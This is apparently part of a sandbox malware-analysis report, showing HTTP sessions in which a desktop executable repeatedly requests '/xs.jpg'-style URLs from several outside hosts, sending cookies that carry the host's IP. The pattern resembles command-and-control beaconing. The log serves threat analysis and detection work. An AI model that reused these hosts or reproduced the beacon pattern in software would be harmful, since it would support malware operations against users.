                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:01.363594055 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:01.589080095 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:01 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:01 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  82192.168.2.94979554.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:01.719700098 CEST312OUTGET /images/xs.jpg?1e16c26e=-1770927066 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0
                                  Jul 5, 2024 08:02:02.547447920 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:02 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  83192.168.2.94979644.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:02.576487064 CEST303OUTGET /xs.jpg?1ec6b77a=-1713269406 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0
                                  Jul 5, 2024 08:02:03.061033010 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:03 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  84192.168.2.94979744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:03.152790070 CEST304OUTGET /images/xs.jpg?1fd1e84b=533850187 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:03.652888060 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:03 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  85192.168.2.94979878.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:03.667335987 CEST193OUTGET /xs.jpg?20c162b1=-1547244171 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:04.362694979 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:04 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  86192.168.2.94979937.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:04.401245117 CEST205OUTGET /images/xs2.jpg?211be604=-406631908 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:05.122004032 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:05 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:05.144130945 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:05.367907047 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:05 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:05 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  87192.168.2.94980054.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:05.518066883 CEST312OUTGET /images/xs.jpg?2373b5c6=-1915824360 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0
                                  Jul 5, 2024 08:02:06.248229027 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:06 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  88192.168.2.94980144.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:06.282663107 CEST301OUTGET /xs.jpg?24e8c9b5=619235765 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0
                                  Jul 5, 2024 08:02:06.771897078 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:06 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  89192.168.2.94980244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:06.807492971 CEST305OUTGET /images/xs.jpg?253cedcf=1874250093 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:07.301615000 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:07 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  90192.168.2.94980378.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:07.323810101 CEST192OUTGET /xs.jpg?26879fc4=1522834916 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:07.997956038 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:07 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  91192.168.2.94980437.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:08.035151005 CEST204OUTGET /images/xs2.jpg?27f237dd=396330763 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:08.760024071 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:08 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:08.763052940 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:08.985199928 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:08 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:08 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  92192.168.2.94980554.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:09.128118992 CEST312OUTGET /images/xs.jpg?29ccf744=-1489773296 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0
                                  Jul 5, 2024 08:02:09.966772079 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:09 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
